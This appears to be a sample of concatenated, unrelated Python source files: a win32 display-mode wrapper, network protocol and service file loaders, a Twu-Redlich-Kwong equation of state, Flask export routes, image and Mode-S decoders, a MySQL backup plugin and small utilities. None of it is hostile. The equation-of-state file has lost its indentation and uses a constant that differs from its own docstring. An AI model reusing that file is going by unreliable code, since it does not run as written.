        canvas = Win32Canvas(self.display, 0, _user32.GetDC(0))
        configs = template.match(canvas)
        # XXX deprecate config's being screen-specific
        for config in configs:
            config.screen = self
        return configs

    def get_device_name(self):
        """Return the GDI device name of this monitor."""
        info = MONITORINFOEX()
        # cbSize must be initialised before the call, per win32 convention.
        info.cbSize = sizeof(MONITORINFOEX)
        _user32.GetMonitorInfoW(self._handle, byref(info))
        return info.szDevice

    def get_modes(self):
        """Enumerate every display mode supported by this monitor."""
        device_name = self.get_device_name()
        i = 0
        modes = []
        while True:
            mode = DEVMODE()
            mode.dmSize = sizeof(DEVMODE)
            # EnumDisplaySettingsW returns 0 once index i runs past the
            # last supported mode.
            r = _user32.EnumDisplaySettingsW(device_name, i, byref(mode))
            if not r:
                break
            modes.append(Win32ScreenMode(self, mode))
            i += 1
        return modes

    def get_mode(self):
        """Return the monitor's currently active display mode."""
        mode = DEVMODE()
        mode.dmSize = sizeof(DEVMODE)
        _user32.EnumDisplaySettingsW(self.get_device_name(),
                                     ENUM_CURRENT_SETTINGS,
                                     byref(mode))
        return Win32ScreenMode(self, mode)

    def set_mode(self, mode):
        """Switch this monitor to the given mode (fullscreen change),
        remembering the original mode so restore_mode() can undo it."""
        assert mode.screen is self
        if not self._initial_mode:
            self._initial_mode = self.get_mode()
        r = _user32.ChangeDisplaySettingsExW(self.get_device_name(),
                                             byref(mode._mode),
                                             None,
                                             CDS_FULLSCREEN,
                                             None)
        # Only adopt the new dimensions if the change actually succeeded.
        if r == DISP_CHANGE_SUCCESSFUL:
            self.width = mode.width
            self.height = mode.height

    def restore_mode(self):
        """Restore the mode that was active before the first set_mode()."""
        if self._initial_mode:
            self.set_mode(self._initial_mode)
class Win32ScreenMode(ScreenMode):
    """Screen mode wrapping a win32 DEVMODE structure."""

    def __init__(self, screen, mode):
        """Expose the interesting DEVMODE fields as plain attributes."""
        super(Win32ScreenMode, self).__init__(screen)
        self._mode = mode
        # Pixel dimensions, colour depth and refresh rate of this mode.
        for attr, field in (("width", "dmPelsWidth"),
                            ("height", "dmPelsHeight"),
                            ("depth", "dmBitsPerPel"),
                            ("rate", "dmDisplayFrequency")):
            setattr(self, attr, getattr(mode, field))
class Win32Canvas(Canvas):
    """Canvas backed by a win32 window handle and its device context."""

    def __init__(self, display, hwnd, hdc):
        super(Win32Canvas, self).__init__(display)
        self.hwnd = hwnd  # window handle (0 when it covers the whole screen)
        self.hdc = hdc    # GDI device context for this window
|
import re
from dadict import DADict
from error import log_loading
ETHER_ANY = "\x00"*6
ETHER_BROADCAST = "\xff"*6
ETH_P_ALL = 3
ETH_P_IP = 0x800
ETH_P_ARP = 0x806
ETH_P_IPV6 = 0x86dd
ARPHDR_ETHER = 1
ARPHDR_METRICOM = 23
ARPHDR_PPP = 512
ARPHDR_LOOPBACK = 772
ARPHDR_TUN = 65534
IPV6_ADDR_UNICAST = 0x01
IPV6_ADDR_MULTICAST = 0x02
IPV6_ADDR_CAST_MASK = 0x0F
IPV6_ADDR_LOOPBACK = 0x10
IPV6_ADDR_GLOBAL = 0x00
IPV6_ADDR_LINKLOCAL = 0x20
IPV6_ADDR_SITELOCAL = 0x40 # deprecated since Sept. 2004 by RFC 3879
IPV6_ADDR_SCOPE_MASK = 0xF0
IPV6_ADDR_6TO4 = 0x0100 # Added to have more specific info (should be 0x0101 ?)
IPV6_ADDR_UNSPECIFIED = 0x10000
MTU = 1600
def load_protocols(filename):
    """Parse an /etc/protocols style file into a DADict mapping
    protocol name -> protocol number.

    '#' comments and blank lines are skipped; unparseable lines are
    logged and ignored so one bad entry does not abort the whole load.
    A missing file yields an empty DADict.
    """
    spaces = re.compile("[ \t]+|\n")
    dct = DADict(_name=filename)
    try:
        # 'with' guarantees the handle is closed (the original leaked it)
        with open(filename) as f:
            for l in f:
                try:
                    # Drop a trailing comment, if any
                    shrp = l.find("#")
                    if shrp >= 0:
                        l = l[:shrp]
                    l = l.strip()
                    if not l:
                        continue
                    lt = tuple(re.split(spaces, l))
                    if len(lt) < 2 or not lt[0]:
                        continue
                    # First column is the protocol name, second its number
                    dct[lt[0]] = int(lt[1])
                except Exception as e:
                    log_loading.info("Couldn't parse file [%s]: line [%r] (%s)" % (filename, l, e))
    except IOError:
        # Report the file we actually failed to open, not a hardcoded path
        log_loading.info("Can't open [%s] file" % filename)
    return dct
IP_PROTOS=load_protocols("/etc/protocols")
def load_ethertypes(filename):
    """Parse an /etc/ethertypes style file into a DADict mapping
    type name -> ethertype number (hexadecimal in the file).

    A missing file is silently ignored; unparseable lines are logged
    and skipped.
    """
    spaces = re.compile("[ \t]+|\n")
    dct = DADict(_name=filename)
    try:
        # 'with' guarantees the handle is closed even if a line blows up
        # (the original's f.close() was skipped on some error paths)
        with open(filename) as f:
            for l in f:
                try:
                    # Drop a trailing comment, if any
                    shrp = l.find("#")
                    if shrp >= 0:
                        l = l[:shrp]
                    l = l.strip()
                    if not l:
                        continue
                    lt = tuple(re.split(spaces, l))
                    if len(lt) < 2 or not lt[0]:
                        continue
                    # Second column is the ethertype, written in hex
                    dct[lt[0]] = int(lt[1], 16)
                except Exception as e:
                    log_loading.info("Couldn't parse file [%s]: line [%r] (%s)" % (filename, l, e))
    except IOError:
        # A missing ethertypes file is not worth reporting
        pass
    return dct
ETHER_TYPES=load_ethertypes("/etc/ethertypes")
def load_services(filename):
    """Parse an /etc/services style file into two DADicts mapping
    service name -> port number, one for TCP and one for UDP.

    Returns the (tcp, udp) couple.  Unparseable lines are logged and
    skipped; a missing file yields two empty DADicts.
    """
    spaces = re.compile("[ \t]+|\n")
    tdct = DADict(_name="%s-tcp" % filename)
    udct = DADict(_name="%s-udp" % filename)
    try:
        # 'with' guarantees the handle is closed on every path
        with open(filename) as f:
            for l in f:
                try:
                    # Drop a trailing comment, if any
                    shrp = l.find("#")
                    if shrp >= 0:
                        l = l[:shrp]
                    l = l.strip()
                    if not l:
                        continue
                    lt = tuple(re.split(spaces, l))
                    if len(lt) < 2 or not lt[0]:
                        continue
                    # Second column is "port/proto"; route by protocol
                    if lt[1].endswith("/tcp"):
                        tdct[lt[0]] = int(lt[1].split('/')[0])
                    elif lt[1].endswith("/udp"):
                        udct[lt[0]] = int(lt[1].split('/')[0])
                except Exception as e:
                    # Fixed message: original read "Couldn't file [%s]"
                    log_loading.warning("Couldn't parse file [%s]: line [%r] (%s)" % (filename, l, e))
    except IOError:
        log_loading.info("Can't open /etc/services file")
    return tdct, udct
TCP_SERVICES,UDP_SERVICES=load_services("/etc/services")
class ManufDA(DADict):
    """DADict specialised for the Wireshark 'manuf' OUI database.

    Values are (short_name, long_name) couples keyed by the upper-case
    OUI prefix ("AA:BB:CC") of a MAC address.
    """

    def fixname(self, val):
        # Keys are kept verbatim: no identifier mangling for OUI strings.
        return val

    def _get_manuf_couple(self, mac):
        prefix = ":".join(mac.split(":")[:3]).upper()
        # Fall back to the MAC itself when the OUI is unknown.
        return self.__dict__.get(prefix, (mac, mac))

    def _get_manuf(self, mac):
        return self._get_manuf_couple(mac)[1]

    def _get_short_manuf(self, mac):
        return self._get_manuf_couple(mac)[0]

    def _resolve_MAC(self, mac):
        prefix = ":".join(mac.split(":")[:3]).upper()
        if prefix in self:
            # Replace the OUI part with the vendor's short name.
            return ":".join([self[prefix][0]] + mac.split(":")[3:])
        return mac
def load_manuf(filename):
    """Load a Wireshark-style 'manuf' OUI file into a ManufDA.

    Useful lines look like 'OUI  short_name  # long name'; the value
    stored is the (short, long) couple.  A missing file is silently
    tolerated.
    """
    try:
        manufdb=ManufDA(_name=filename)
        for l in open(filename):
            try:
                l = l.strip()
                if not l or l.startswith("#"):
                    continue
                oui,shrt=l.split()[:2]
                i = l.find("#")
                if i < 0:
                    # No long name on this line; reuse the short one
                    lng=shrt
                else:
                    # Skip "# " before the long name.
                    # NOTE(review): assumes exactly one space after '#'.
                    lng = l[i+2:]
                manufdb[oui] = shrt,lng
            except Exception,e:
                log_loading.warning("Couldn't parse one line from [%s] [%r] (%s)" % (filename, l, e))
    except IOError:
        #log_loading.warning("Couldn't open [%s] file" % filename)
        pass
    return manufdb
class KnowledgeBase:
    """Base class for lazily-loaded knowledge bases.

    Subclasses override lazy_init() to populate self.base from
    self.filename the first time the base is needed.
    """

    def __init__(self, filename):
        self.filename = filename
        self.base = None

    def lazy_init(self):
        # Default implementation: an empty knowledge base.
        self.base = ""

    def reload(self, filename=None):
        """Re-run lazy_init(), optionally from a new filename.

        If loading produces nothing, the previous base is kept.
        """
        if filename is not None:
            self.filename = filename
        previous = self.base
        self.base = None
        self.lazy_init()
        if self.base is None:
            self.base = previous

    def get_base(self):
        """Return the knowledge base, loading it on first access."""
        if self.base is None:
            self.lazy_init()
        return self.base
|
r"""Pychemqt, Chemical Engineering Process simulator
Copyright (C) 2009-2017, Juan José Gómez Romera <jjgomera@gmail.com>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>."""
from math import exp
from scipy.constants import R
from lib.EoS.Cubic.RK import RK
class RKTwu(RK):
r"""Equation of state of Redlich-Kwong with a modified alpha temperature
dependence by Twu, (1995) [1]_.
.. math::
\begin{array}[t]{l}
P = \frac{RT}{V-b}-\frac{a}{V\left(V+b\right)}\\
a = 0.427480263354\frac{R^2T_c^2}{P_c}\alpha\\
b = 0.086640349965\frac{RT_c}{P_c}\\
\alpha = alpha^{(0)} + \omega\left(\alpha^{(1)}-\alpha^{(0)}\right)\\
\alpha^{(0)} = T_r^{-0.201158} \exp{0.141599\left(1-T_r^{2.29528}
\right)}\\
\alpha^{(1)} = T_r^{-0.660145} \exp{0.500315\left(1-T_r^{2.63165}
\right)}\\
\end{array}
"""
__title__ = "Twu-Redlich-Kwong (1995)"
__status__ = "RKTwu"
__doi__ = {
"autor": "Twu, C.H., Coon, J.E., Cunningham, J.R.",
"title": "A New Generalized Alpha Function for a Cubic Equation of "
"State Part 2. Redlich-Kwong equation",
"ref": "Fluid Phase Equilibria 105 (1995) 61-69",
"doi": "10.1016/0378-3812(94)02602-w"},
def _lib(self, cmp, T):
"""Modified parameteres correlations"""
a = 0.42748023354*R**2*cmp.Tc**2/cmp.Pc
alfa = self._alpha(cmp, T)
b = 0.086640349965*R*cmp.Tc/cmp.Pc
return a*alfa, b
def _alpha(self, cmp, T):
"""Modified α expression"""
Tr = T/cmp.Tc
if Tr <= 1:
alpha0 = Tr**(-0.201158)*exp(0.141599*(1-Tr**2.29528)) # Eq 17
alpha1 = Tr**(-0.660145)*exp(0.500315*(1-Tr**2.63165)) # Eq 18
else:
alpha0 = Tr**(-1.10)*exp(0.441411*(1-Tr**(-1.30))) # Eq 19
alpha1 = Tr**(-2.31278)*exp(0.03258*(1-Tr**(-10.3128))) # Eq 20
# Eq 15
alpha = alpha0 + cmp.f_acent*(alpha1-alpha0)
return alpha
if __name__ == "__main__":
from lib.mezcla import Mezcla
mix = Mezcla(5, ids=[4], caudalMolar=1, fraccionMolar=[1])
eq = RKTwu(300, 9.9742e5, mix)
print('%0.0f %0.1f' % (eq.Vg.ccmol, eq.Vl.ccmol))
eq = RKTwu(300, 42.477e5, mix)
print('%0.1f' % (eq.Vl.ccmol))
|
from flask import Blueprint
from flask import flash
from flask import make_response, render_template
from flask_login import current_user
from markupsafe import Markup
from app.helpers.data_getter import DataGetter
from app.helpers.auth import AuthManager
from app.helpers.exporters.ical import ICalExporter
from app.helpers.exporters.pentabarfxml import PentabarfExporter
from app.helpers.exporters.xcal import XCalExporter
from app.helpers.permission_decorators import can_access
event_export = Blueprint('event_export', __name__, url_prefix='/events/<int:event_id>/export')
@event_export.route('/')
@can_access
def display_export_view(event_id):
    """Render the export page for an event, listing past export jobs."""
    event = DataGetter.get_event(event_id)
    export_jobs = DataGetter.get_export_jobs(event_id)
    user = current_user
    if not AuthManager.is_verified_user():
        # Markup() marks the string safe so the embedded link renders.
        flash(Markup("Your account is unverified. "
                     "Please verify by clicking on the confirmation link that has been emailed to you."
                     '<br>Did not get the email? Please <a href="/resend_email/" class="alert-link"> '
                     'click here to resend the confirmation.</a>'))
    return render_template(
        'gentelella/admin/event/export/export.html', event=event, export_jobs=export_jobs,
        current_user=user
    )
@event_export.route('/pentabarf.xml')
@can_access
def pentabarf_export_view(event_id):
    """Serve the event schedule as a downloadable Pentabarf XML file."""
    exported = PentabarfExporter.export(event_id)
    response = make_response(exported)
    response.headers["Content-Type"] = "application/xml"
    response.headers["Content-Disposition"] = "attachment; filename=pentabarf.xml"
    return response
@event_export.route('/calendar.ical')
@can_access
def ical_export_view(event_id):
    """Serve the event schedule as a downloadable iCalendar file."""
    exported = ICalExporter.export(event_id)
    response = make_response(exported)
    response.headers["Content-Type"] = "text/calendar"
    response.headers["Content-Disposition"] = "attachment; filename=calendar.ics"
    return response
@event_export.route('/calendar.xcs')
@can_access
def xcal_export_view(event_id):
    """Serve the event schedule as a downloadable xCal file."""
    exported = XCalExporter.export(event_id)
    response = make_response(exported)
    response.headers["Content-Type"] = "text/calendar"
    response.headers["Content-Disposition"] = "attachment; filename=calendar.xcs"
    return response
|
__author__ = 'Mayur M'
import ImgIO
def add(image1, image2):
    """Pixel-wise addition of two images of identical dimensions.

    Returns three lists (red, green, blue) with the summed channel
    values; sums outside the 8-bit range wrap around modulo 256.

    Raises:
        ValueError: if the two images differ in width or height.
        (The original printed an error and implicitly returned None,
        which made callers crash later when unpacking the result.)
    """
    if image1.width != image2.width or image1.height != image2.height:
        raise ValueError("Error: image dimensions do not match!")
    return_red = []
    return_green = []
    return_blue = []
    for i in range(len(image1.red)):
        # Add the RGB values channel by channel, wrapping on overflow.
        # Wrap uses % 256 (size of the 8-bit range): the original's
        # % 255 mapped a sum of 256 to 1 instead of 0.
        return_red.append((image1.red[i] + image2.red[i]) % 256)
        return_green.append((image1.green[i] + image2.green[i]) % 256)
        return_blue.append((image1.blue[i] + image2.blue[i]) % 256)
    return return_red, return_green, return_blue
def main():  # test case
    """Manual smoke test: add two images and write the result to disk."""
    print('start!!!!!')
    ima = ImgIO.ImgIO()
    imb = ImgIO.ImgIO()
    # NOTE(review): both inputs must share dimensions or add() fails.
    ima.read_image("y.jpg")
    imb.read_image("test1.png")
    add_r, add_g, add_b = add(ima, imb)
    imc = ImgIO.ImgIO()
    imc.read_list(add_r, add_g, add_b, "final1.png", ima.width, ima.height)
    imc.write_image("final1.png")


if __name__ == '__main__':
    main()
|
"""
Decode all-call reply messages, with downlink format 11
"""
import functools

from pyModeS import common
def _checkdf(func):
"""Ensure downlink format is 11."""
def wrapper(msg):
df = common.df(msg)
if df != 11:
raise RuntimeError(
"Incorrect downlink format, expect 11, got {}".format(df)
)
return func(msg)
return wrapper
@_checkdf
def icao(msg):
    """Decode transponder code (ICAO address).

    Args:
        msg (str): 14 hexdigits string

    Returns:
        string: ICAO address
    """
    # DF11 carries the address directly; delegate to the common decoder.
    return common.icao(msg)
@_checkdf
def interrogator(msg):
    """Decode interrogator identifier code.

    Args:
        msg (str): 14 hexdigits string

    Returns:
        str: interrogator identifier code ("IIn", "SIn" or "corrupt IC")
    """
    # The CRC remainder carries the CL and IC fields: the top three bits
    # are CL, the bottom four IC.  Remainders 0-15 encode II codes,
    # 16-79 SI codes; anything above 79 indicates corruption.
    remainder = common.crc(msg)
    if remainder > 79:
        return "corrupt IC"
    if remainder < 16:
        return "II" + str(remainder)
    return "SI" + str(remainder - 16)
@_checkdf
def capability(msg):
    """Decode transponder capability.

    Args:
        msg (str): 14 hexdigits string

    Returns:
        int, str: transponder capability, description
    """
    msgbin = common.hex2bin(msg)
    # CA field occupies message bits 6-8.
    ca = common.bin2int(msgbin[5:8])

    if ca == 0:
        text = "level 1 transponder"
    elif ca == 4:
        text = "level 2 transponder, ability to set CA to 7, on ground"
    elif ca == 5:
        text = "level 2 transponder, ability to set CA to 7, airborne"
    elif ca == 6:
        # Fixed typo: the original description read "evel 2 transponder".
        text = "level 2 transponder, ability to set CA to 7, either airborne or ground"
    elif ca == 7:
        # Fixed missing space after the comma in the original message.
        text = "Downlink Request value is 0, or the Flight Status is 2, 3, 4 or 5, either airborne or on the ground"
    else:
        # Remaining CA values carry no description.
        text = None

    return ca, text
|
from typing import List
class Message(object):
    """Declaration-only container for a parsed protocol message.

    NOTE(review): the servername/nickname/username/hostname prefix plus
    command/params shape looks like an IRC-style message -- confirm
    against the code that populates these fields.
    """

    class Origin(object):
        # Message prefix: either a server name or a nick/user/host triple.
        servername: str
        nickname: str
        username: str
        hostname: str

    # Command verb and its parameter list; instances are filled elsewhere.
    command: str
    origin: Origin
    params: List[str]
|
"""pybackup - Backup Plugin for MySQL Database
"""
import os
from pybackup import errors
from pybackup import utils
from pybackup.logmgr import logger
from pybackup.plugins import BackupPluginBase
from pysysinfo.mysql import MySQLinfo
__author__ = "Ali Onur Uyar"
__copyright__ = "Copyright 2011, Ali Onur Uyar"
__credits__ = []
__license__ = "GPL"
__version__ = "0.5"
__maintainer__ = "Ali Onur Uyar"
__email__ = "aouyar at gmail.com"
__status__ = "Development"
class PluginMySQL(BackupPluginBase):
    """Backup plugin that dumps MySQL databases using mysqldump.

    Connection options come from the job configuration; the password is
    passed through the MYSQL_PWD environment variable so that it never
    appears on the command line.
    """
    # Descriptions of the plugin-specific configuration options.
    _extOpts = {'filename_dump_db': 'Filename for MySQL dump files.',
                'db_host': 'MySQL Database Server Name or IP.',
                'db_port': 'MySQL Database Server Port.',
                'db_user': 'MySQL Database Server User.',
                'db_password': 'MySQL Database Server Password.',
                'db_list': 'List of databases. (All databases by default.)',}
    # No plugin-specific option is mandatory.
    _extReqOptList = ()
    # Defaults merged into the job configuration.
    _extDefaults = {'cmd_mysqldump': 'mysqldump',
                    'filename_dump_db': 'mysql_dump',}

    def __init__(self, global_conf, job_conf):
        """Constructor

        @param global_conf: Dictionary of general configuration options.
        @param job_conf: Dictionary of job configuration options.
        """
        BackupPluginBase.__init__(self, global_conf, job_conf)
        # Build the common mysqldump connection arguments from the
        # configured host / port / user, skipping unset options.
        self._connArgs = []
        for (opt, key) in (('-h', 'db_host'),
                           ('-P', 'db_port'),
                           ('-u', 'db_user')):
            val = self._conf.get(key)
            if val is not None:
                self._connArgs.extend([opt, val])
        # Pass the password via the environment (MYSQL_PWD) rather than
        # the command line, where other local users could see it.
        self._env = os.environ.copy()
        db_password = self._conf.get('db_password')
        if db_password is not None:
            self._env['MYSQL_PWD'] = db_password

    def dumpDatabase(self, db, data=True):
        """Dump a single database to a compressed file in the job path.

        @param db:   Database name.
        @param data: True dumps the table contents; False dumps only the
                     database container (just the CREATE DATABASE part).
        """
        if data:
            dump_type = 'data'
            dump_desc = 'MySQL Database Contents'
        else:
            dump_type = 'db'
            dump_desc = 'MySQL Database Container'
        dump_filename = "%s_%s_%s.dump.%s" % (self._conf['filename_dump_db'],
                                              db, dump_type,
                                              self._conf['suffix_compress'])
        dump_path = os.path.join(self._conf['job_path'], dump_filename)
        args = [self._conf['cmd_mysqldump'],]
        args.extend(self._connArgs)
        if db in ('information_schema', 'mysql'):
            # System schemas: avoid LOCK TABLES, which may be forbidden.
            args.append('--skip-lock-tables')
        if not data:
            # Container-only dump: suppress schema and rows, keep the
            # CREATE DATABASE statement emitted by --databases.
            args.extend(['--no-create-info', '--no-data' ,'--databases'])
        args.append(db)
        logger.info("Starting dump of %s: %s"
                    " Backup: %s", dump_desc, db, dump_path)
        returncode, out, err = self._execBackupCmd(args, #@UnusedVariable
                                                   self._env,
                                                   out_path=dump_path,
                                                   out_compress=True)
        if returncode == 0:
            logger.info("Finished dump of %s: %s"
                        " Backup: %s", dump_desc, db, dump_path)
        else:
            raise errors.BackupError("Dump of %s for %s failed "
                                     "with error code: %s"
                                     % (dump_desc, db, returncode),
                                     *utils.splitMsg(err))

    def dumpDatabases(self):
        """Dump every configured database; when 'db_list' is unset, query
        the server for the full database list first.  Each database gets
        a container dump followed by a data dump."""
        if not self._conf.has_key('db_list'):
            try:
                my = MySQLinfo(host=self._conf.get('db_host'),
                               port=self._conf.get('db_port'),
                               user=self._conf.get('db_user'),
                               password=self._conf.get('db_password'))
                self._conf['db_list'] = my.getDatabases()
                del my
            except Exception, e:
                raise errors.BackupError("Connection to MySQL Server "
                                         "for querying database list failed.",
                                         "Error Message: %s" % str(e))
        logger.info("Starting dump of %d MySQL Databases.",
                    len(self._conf['db_list']))
        for db in self._conf['db_list']:
            self.dumpDatabase(db, False)
            self.dumpDatabase(db, True)
        logger.info("Finished dump of MySQL Databases.")

    def dumpFull(self):
        """Full backup entry point; currently identical to dumpDatabases()."""
        self.dumpDatabases()
description = "Plugin for backups of MySQL Database."
methodList = (('mysql_dump_full', PluginMySQL, 'dumpFull'),
('mysql_dump_databases', PluginMySQL, 'dumpDatabases'),)
|
import os
import glob
import cgi

import PrintPages_test as pt

# Log the requesting client and emit the page header plus input form.
# NOTE(review): cgi.escape was deprecated and removed in Python 3.8+;
# html.escape is the replacement -- confirm the target runtime before
# switching.
address = cgi.escape(os.environ["REMOTE_ADDR"])
script = "Main Model Form"
pt.write_log_entry(script, address)
pt.print_header('GrowChinook', 'Std')
pt.print_full_form(None, None, 'in', 'RunModel.py')
# List the CSV files already uploaded so they can be shown to the user.
# (glob.glob already returns a list; the original wrapped it in a
# redundant comprehension and set an unused 'extension' variable.)
os.chdir('uploads')
result = glob.glob('*.csv')
print('''
{}
</div>
</body>
'''.format(result))
print('</html>')
|
class Solution(object):
    """Combination Sum II: unique combinations of candidates (each index
    usable at most once) that sum to target."""

    @staticmethod
    def dfs(candidates, target, vis, res, cur_idx, sum):
        # Backtracking over sorted candidates.  All state is shared and
        # mutated in place: vis marks indices in use, cur_idx is the
        # stack of chosen indices (seeded with -1 as a sentinel), res
        # collects complete combinations.  NOTE: 'sum' shadows the builtin.
        if sum > target:
            return
        if sum == target:
            # Drop the -1 sentinel when materialising the combination.
            ans = [candidates[i] for i in cur_idx if i >= 0]
            res.append(ans)
            return
        if sum < target:
            for i, v in enumerate(candidates):
                if sum + v > target:
                    # candidates are sorted: no later value can fit either
                    break
                if i != cur_idx[-1] + 1 and candidates[i] == candidates[i-1]:
                    # skip duplicate values at the same tree depth to
                    # avoid emitting the same combination twice
                    continue
                if i >= cur_idx[-1] and (not vis[i]):
                    vis[i] = 1
                    cur_idx.append(i)
                    Solution.dfs(candidates, target, vis, res, cur_idx, sum+v)
                    # undo the choice on the way back up
                    vis[i] = 0
                    cur_idx.pop()

    def combinationSum2(self, candidates, target):
        """
        :type candidates: List[int]
        :type target: int
        :rtype: List[List[int]]
        """
        candidates = sorted(candidates)
        n = len(candidates)  # NOTE(review): unused
        res = []
        cur_idx = [-1]
        vis = [0 for _ in candidates]
        Solution.dfs(candidates, target, vis, res, cur_idx, 0)
        return res
# Ad-hoc manual check (Python 2 print syntax).  Expected results:
# [[1, 1, 6], [1, 2, 5], [1, 7], [2, 6]] and [[1, 2, 2], [5]].
s = Solution()
print s.combinationSum2([10,1,2,7,6,1,5], 8)
print s.combinationSum2([2,5,2,1,2], 5)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.